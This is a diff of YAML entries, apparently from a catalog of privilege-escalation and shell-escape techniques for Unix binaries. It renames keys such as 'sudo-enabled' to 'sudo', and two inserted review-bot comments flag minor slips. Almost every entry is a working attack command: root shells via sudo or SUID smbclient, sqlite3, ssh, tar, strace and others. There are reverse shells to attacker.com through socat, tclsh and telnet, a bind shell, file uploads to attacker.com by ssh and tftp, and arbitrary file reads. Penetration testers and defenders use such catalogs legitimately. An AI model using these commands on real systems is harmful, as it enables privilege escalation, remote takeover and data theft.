@ -1,11 +1,11 @@
|
||||
---
|
||||
description: A valid SMB/CIFS server must be available.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
smbclient \\ip\share
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo smbclient \\ip\share
|
||||
!/bin/sh
|
||||
|
@ -1,23 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
bind-shell-interactive:
|
||||
bind-shell:
|
||||
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sort -m "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sort -m "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo sort -m "$LFILE"
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: sqlite3 /dev/null '.shell /bin/sh'
|
||||
file-write:
|
||||
- code: |
|
||||
@ -14,8 +14,8 @@ functions:
|
||||
.import $LFILE t
|
||||
SELECT * FROM t;
|
||||
EOF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
|
||||
---
|
||||
|
@ -1,18 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost $SHELL --noprofile --norc
|
||||
- description: Spawn interactive shell through ProxyCommand option.
|
||||
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
@ -24,7 +24,7 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
ssh -F $LFILE localhost
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Spawn interactive root shell through ProxyCommand option.
|
||||
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: stdbuf -i0 /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./stdbuf -i0 /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo stdbuf -i0 /bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
---
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
tail -c1G "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./tail -c1G "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo tail -c1G "$LFILE"
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- description: This only works for GNU tar.
|
||||
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
|
||||
file-write:
|
||||
@ -17,8 +17,8 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
---
|
||||
|
@ -1,20 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
reverse-shell-non-interactive:
|
||||
non-interactive-reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
|
@ -1,14 +1,14 @@
|
||||
---
|
||||
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
command:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo DATA | sudo tee -a "$LFILE"
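Review bot: The first entry in the `@ -5,11` hunk runs `echo DATA | ./tee -a "$LFILE"`, byte-identical to the `suid` entry right after it, which suggests a copy-paste slip: by the pattern of the other files in this commit, the unprivileged entry presumably should invoke plain `tee -a "$LFILE"`, as the `sudo` entry uses `sudo tee`. The key that owns the first entry lies above the hunk start, so this is inferred from entry order rather than visible.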
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -8,14 +8,14 @@ functions:
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
TF=$(mktemp -u)
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
@ -23,7 +23,7 @@ functions:
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
limited-suid:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,24 +1,24 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
file-upload:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
file-download:
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
suid-enabled:
|
||||
suid:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
./tftp $RHOST
|
||||
put file_to_send
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
|
@ -1,10 +1,10 @@
|
||||
---
|
||||
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: /usr/bin/time /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./time /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo /usr/bin/time /bin/sh
|
||||
---
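Review bot: The `description` line's code span is mis-delimited: the opening backtick is placed before the space ("than` /usr/bin/time`"), so the rendered span starts with a leading space and the text reads oddly. Moving the backtick after the space gives the intended "than `/usr/bin/time`". This is a documentation nit only; the renamed keys and commands below are unaffected.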
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: timeout 7d /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./timeout 7d /bin/sh -p
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo timeout --foreground 7d /bin/sh
|
||||
---
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
ul "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./ul "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo ul "$LFILE"
|
||||
|
@ -4,11 +4,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
unexpand -t99999999 "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./unexpand -t99999999 "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo unexpand -t99999999 "$LFILE"
|
||||
|
@ -5,11 +5,11 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
uniq "$LFILE"
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./uniq "$LFILE"
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo uniq "$LFILE"
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: unshare /bin/sh
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./unshare -r /bin/sh
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo unshare /bin/sh
|
||||
---
|
||||
|